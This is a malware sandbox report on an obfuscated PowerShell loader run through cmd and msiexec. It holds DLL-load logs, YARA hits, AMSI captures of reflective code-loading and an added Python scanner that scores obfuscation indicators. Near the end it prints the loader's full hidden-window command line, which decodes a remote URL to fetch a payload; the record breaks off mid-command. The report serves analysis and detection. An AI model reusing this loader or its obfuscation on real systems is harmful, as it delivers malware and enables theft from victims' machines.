                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cscapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: taskflowdataengine.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cdp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: umpdc.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dsreg.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sxs.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: apphelp.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: aclayers.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mpr.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc_os.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: edputil.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: windows.staterepositoryps.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: appresolver.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: bcp47langs.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: slc.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sppc.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: onecorecommonproxystub.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mswsock.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: winnsi.dll
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pstorec.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pstorec.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: powershell.exe, 00000005.00000002.2390118940.0000000007FC0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Management.Automation.pdb-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32A source: powershell.exe, 00000005.00000002.2376551918.0000000006F61000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: .Core.pdbB source: powershell.exe, 00000005.00000002.2376551918.0000000006F61000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: stem.Core.pdbF source: powershell.exe, 00000005.00000002.2376551918.0000000006F61000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                Source: Yara match | File source: 00000005.00000002.2402043771.000000000A47D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.2391081799.00000000081E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.2369581141.0000000005439000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2175598804.0000024110071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($Overgun)$gLoBaL:tRaNseNna = [sYstem.tEXT.EnCoDINg]::AsCIi.geTStRIng($bAkteRIEkulTurs)$GlOBAL:nONGalaCtic=$TRAnSenNa.sUbsTriNG($hOLDinG,$sevRdiGheders)<#Arbejdsborde Practised Ofringe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Repousse $Xicak $Druesyrens), (Sagsgere @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Knoklernes = [AppDomain]::CurrentDomain.GetAssemblies()$global:Madd
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($skypumpens)), $Matchwoodfdryppende).DefineDynamicModule($Restaurationens, $false).DefineType($Upstanding110, $Verandaerne, [System.Mul
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($Overgun)$gLoBaL:tRaNseNna = [sYstem.tEXT.EnCoDINg]::AsCIi.geTStRIng($bAkteRIEkulTurs)$GlOBAL:nONGalaCtic=$TRAnSenNa.sUbsTriNG($hOLDinG,$sevRdiGheders)<#Arbejdsborde Practised Ofringe
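The AMSI buffers above and the command line that follows expose the features a detection can key on without decoding anything: a hidden window, junk `<# ... #>` comment blocks, the call operator applied to a variable (`& ($Fandangoer)`), a stride-5 `for` loop over a string, `FromBase64String` followed by a `.Substring($a,$b)` carve, `GetDelegateForFunctionPointer`, reflective `DefineDynamicAssembly`/`DefineDynamicModule`/`DefineType`, and randomised letter case in well-known tokens (`sYstem.tEXT.EnCoDINg`, `GlOBAL`, `sUbsTriNG`). The scanner below is an added example written for this page, not a Joe Sandbox signature or a Sigma rule; the indicator weights are illustrative choices, not values from the report. Its samples are the three distinct AMSI fragments and the opening of the command line copied from this page, plus one benign command constructed here for contrast.

```python
import re

# (name, pattern, weight). Weights are illustrative, chosen for this example.
# Matching is case-insensitive because the loader randomises letter case.
INDICATORS = [
    ("hidden_window",     r"-windowstyle\s+hidden", 2),
    ("call_operator_var", r"&\s*\(\s*\$\w+\s*\)", 3),            # & ($Fandangoer) (...)
    ("comment_junk",      r"<#[^#]{1,120}#>", 1),                # <#Sweetshop ... #>
    ("base64_decode",     r"FromBase64String\s*\(", 2),
    ("substring_carve",   r"\.substring\s*\(\s*\$\w+\s*,\s*\$\w+\s*\)", 2),
    ("delegate_ptr",      r"GetDelegateForFunctionPointer", 4),
    ("dynamic_assembly",  r"DefineDynamicAssembly|DefineDynamicModule|DefineType", 4),
    ("stride_decoder",    r"for\s*\(\s*\$\w+\s*=\s*\d+\s*;\s*\$\w+\s*-lt\s*\$\w+\s*;"
                          r"\s*\$\w+\s*\+=\s*\d+\s*\)", 3),
]
MAX_COUNT = 3   # cap per indicator so one repeated token cannot dominate the score

# Tokens that PowerShell authors write in a handful of fixed spellings; any other
# casing (sYstem, GlOBAL, sUbsTriNG) is the loader's case randomisation.
CANONICAL = {
    "system":    {"System", "system", "SYSTEM"},
    "global":    {"global", "Global", "GLOBAL"},
    "substring": {"Substring", "substring", "SubString"},
    "encoding":  {"Encoding", "encoding"},
    "text":      {"Text", "text", "TEXT"},
}
KEYWORD_RE = re.compile(r"\b(" + "|".join(CANONICAL) + r")\b", re.IGNORECASE)
MAX_ODD = 5


def odd_case_tokens(text: str) -> list:
    """Known tokens whose spelling is not one of the canonical forms."""
    return [m.group(0) for m in KEYWORD_RE.finditer(text)
            if m.group(0) not in CANONICAL[m.group(0).lower()]]


def scan(text: str) -> dict:
    """Score one AMSI buffer or command line; returns the score and the evidence."""
    hits = {}
    for name, pattern, _ in INDICATORS:
        n = len(re.findall(pattern, text, re.IGNORECASE))
        if n:
            hits[name] = n
    odd = odd_case_tokens(text)
    score = sum(w * min(hits.get(name, 0), MAX_COUNT) for name, _, w in INDICATORS)
    score += min(len(odd), MAX_ODD)
    return {"score": score, "hits": hits, "odd_case": odd}


# Samples: the three distinct AMSI fragments and the start of the command line
# are copied from this report; the benign command is constructed for contrast.
AMSI_FRAGMENTS = [
    "FromBase64String($Overgun)$gLoBaL:tRaNseNna = [sYstem.tEXT.EnCoDINg]::AsCIi.geTStRIng"
    "($bAkteRIEkulTurs)$GlOBAL:nONGalaCtic=$TRAnSenNa.sUbsTriNG($hOLDinG,$sevRdiGheders)"
    "<#Arbejdsborde Practised Ofringe",
    "GetDelegateForFunctionPointer((Repousse $Xicak $Druesyrens), (Sagsgere @([IntPtr], "
    "[UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Knoklernes = [AppDomain]::CurrentDomain"
    ".GetAssemblies()$global:Madd",
    "DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($skypumpens)), "
    "$Matchwoodfdryppende).DefineDynamicModule($Restaurationens, $false).DefineType"
    "($Upstanding110, $Verandaerne, [System.Mul",
]
COMMAND_LINE_HEAD = (
    "powershell.exe -windowstyle hidden \" <#Sweetshop Forprogrammere Bevidstlse #>;"
    "$Billetkontoret='hovedngles';<#hygroscopically Borgerliggr Torpets Unclassified "
    "Blokvognens #>;$Psykes=$sulfate+$host.UI;function Boendes($Motorisere){If ($Psykes) "
    "{$Unpictorialised++;}$Aarskiftet=$genindkaldte+$Motorisere.'Length'-$Unpictorialised; "
    "for( $Herregaardene131=4;$Herregaardene131 -lt $Aarskiftet;$Herregaardene131+=5)"
    "{$Pyramidia++;$Foredevote+=$Motorisere[$Herregaardene131];$Riskfulness='Oprejses';}"
    "$Foredevote;}function Aromastofs($Oversigtsbilleders173){ & ($Fandangoer) "
    "($Oversigtsbilleders173);}"
)
BENIGN = r"Get-ChildItem C:\Temp -Recurse | Where-Object { $_.Length -gt 1MB } | Select-Object FullName"

if __name__ == "__main__":
    for label, text in [("amsi-1", AMSI_FRAGMENTS[0]), ("amsi-2", AMSI_FRAGMENTS[1]),
                        ("amsi-3", AMSI_FRAGMENTS[2]), ("cmdline", COMMAND_LINE_HEAD),
                        ("benign", BENIGN)]:
        print(label, scan(text))
```

The per-indicator cap and the cap on odd-case tokens keep a single repeated construct from producing an arbitrarily high score; the exact threshold to alert on is a local choice, but every one of the report's fragments scores well above the benign command, which scores zero.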
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Sweetshop Forprogrammere Bevidstlse #>;$Billetkontoret='hovedngles';<#hygroscopically Borgerliggr Torpets Unclassified Blokvognens #>;$Psykes=$sulfate+$host.UI;function Boendes($Motorisere){If ($Psykes) {$Unpictorialised++;}$Aarskiftet=$genindkaldte+$Motorisere.'Length'-$Unpictorialised; for( $Herregaardene131=4;$Herregaardene131 -lt $Aarskiftet;$Herregaardene131+=5){$Pyramidia++;$Foredevote+=$Motorisere[$Herregaardene131];$Riskfulness='Oprejses';}$Foredevote;}function Aromastofs($Oversigtsbilleders173){ & ($Fandangoer) ($Oversigtsbilleders173);}$Kolonialvares=Boendes 'LaggMHjelo D lz dreiUnsilMat lTa fa F e/Forb ';$Kolonialvares+=Boendes 'S ks5Bran. Pr 0Bede Topi(Fl bWK.ldiMadenbeard,uako TomwMarrsVis JerkN UdaT kov oss1Agra0T nn.besk0bio ;Feri .aphWNobbiRumln Feu6Pick4Ansv;Nord Hen xBirk6 Afs4sk d;,oss OffrKrydvDomm:Spr 1Sm g3Uud,1A ti. lmu0Calo) Si Man G askeHjercde.ak ssioUdsm/ Rot2Depo0Verb1Erot0Elec0Spar1,iks0 Kun1Jord PreFYeariRe orShreeS orfOct,oFarax Ri /Supe1Mail3Lap 1Pyxi.Sawn0Tyre ';$Sparebsserne=Boendes ' CoeuR mmSMatlE Br rVo,d-U,faaKon.gBrn.EForsnDolkt kva ';$Cafuso=Boendes 'Cho,hPytot,uttt A dp V,tsSmle:mode/ C,u/St ecLamiaSc irfraneSesue yhrGodsfHjemi KunnDecrdlivre OutrSnek. 
IderOrbio .av/Mngdv pndn Ko,/Juk T Pr rT,keaW,stuNsker,ackiRes.gDis hSpaaeBem.d PoleCalfr Bas.ProcsHeineTranaAmin ';$Luncher=Boendes 'R ck>Vi,t ';$Fandangoer=Boendes 'HanhIunrueBoniXTemp ';$Ensnarement='Unlabialise167';$Totalisatorers='\Knighting.Pro';Aromastofs (Boendes ' Alg$E phgTinkLBadkOBrugBLayoaIndblBrne:Pr dT BatRBa keIspim N,nmSkumePrigspseutUd ao udfL,rouECu tnpas,ehals=Pala$Decie BebnLaarVCart:Rou,aChilp ampDri.DSikkaF.intAdm.AAn.i+Scud$,atat,wkwoRekttGaleAHardLBasiI Li S .tyAEquiTStosO.chorafstEVoveRSlidSOver ');Aromastofs (Boendes 'Venc$ XylgSlicLCo doVietb Pr.ADe sLPrst:UndepLordo Mi tJordASke sDynasVak.iElemFSheeEBrutRTr noSkitUAlcaS Kon=Folk$ entcTrapaSammfDy eUGuatsRovso ksp.Hu vsInseP ImplCollIRacetJ,ds(Dsl,$ Ug.l Z ru.ypeNFortc RgthN veESbeoRMed ) Soc ');Aromastofs (Boendes ' For[EmbenIsbjEtr ntrun .G nesFredEKaffRFir VLilliWaffc uefEHl np Lono l einasiNNonptKeycmExteA ByonFedeAMi rg ReiESu erkamp]Dis :Infe: ForsTrykEE,orCUnimu S irNontIKluntAtr yFejlpForor FroOAktutplotOH veC ilkOLoupLNonc Svk=Acep Lae[SturNDrage Va TT.le. Sk SMu feSlvecShr uSeleR bevI DdktTriryInwep TchrOverO ooptAizoo usCTargO,ettLLiteTNonpYArbepTyvee O,e]Tros:Tank:.enetKneblsomeS rti1dict2Well ');$Cafuso=$Potassiferous[0];$Kvatorialguineaner=(Boendes 'st.k$Vin GVrngl.toloMo,ebOv yA VoyLCoun:HestU.altn MaiE Ru vPi ta TouNBroke ouis u.gCYanaEStr,NAquaTRedrL NotYMel.=konsn ampeN tuwGuls- A.kOCivibAkkrjConfE Pa c U.dTCcdc SnkeSKekcYUrimsBalatAfdaEFlaaM Ach. osn preE Drat Sk .Wardw ExcEGangBAllecCro lfrisIInteeAnmen UndTmaan ');Aromastofs ($Kvatorialguineaner);Aromastofs (Boendes 'Fors$ RebU SpanAcineamfev MinaTeernRegieJulos onecpheneDecln ButtoverlTilsyUnh.. ds
